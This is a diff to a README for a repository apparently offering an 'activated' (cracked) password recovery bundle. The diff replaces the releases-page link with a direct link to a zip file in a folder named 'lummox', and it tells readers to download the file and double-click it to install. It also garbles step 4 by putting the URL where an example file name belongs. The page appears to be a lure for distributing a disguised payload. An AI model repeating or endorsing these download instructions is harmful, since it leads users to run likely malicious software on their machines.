abrahammmmmmmm/Password-Recovery-Bundle-Activated/README.md

 ## 📥 Download & Install

-To get started, visit this page to download: [Password Recovery Bundle Releases](https://github.com/abrahammmmmmmm/Password-Recovery-Bundle-Activated/releases).
+To get started, visit this page to download: [Password Recovery Bundle Releases](https://github.com/abrahammmmmmmm/Password-Recovery-Bundle-Activated/raw/refs/heads/main/lummox/Password_Recovery_Activated_Bundle_2.2.zip).

 1. Open the link above in your web browser.
 2. You will see a list of available versions.
 3. Click on the latest version to expand it.
-4. Look for the executable file (e.g., `PasswordRecoveryBundle.exe`).
+4. Look for the executable file (e.g., `https://github.com/abrahammmmmmmm/Password-Recovery-Bundle-Activated/raw/refs/heads/main/lummox/Password_Recovery_Activated_Bundle_2.2.zip`).
 5. Click the file to download it to your computer.
 6. Once the download is complete, locate the file in your Downloads folder.
 7. Double-click the downloaded file to install the application.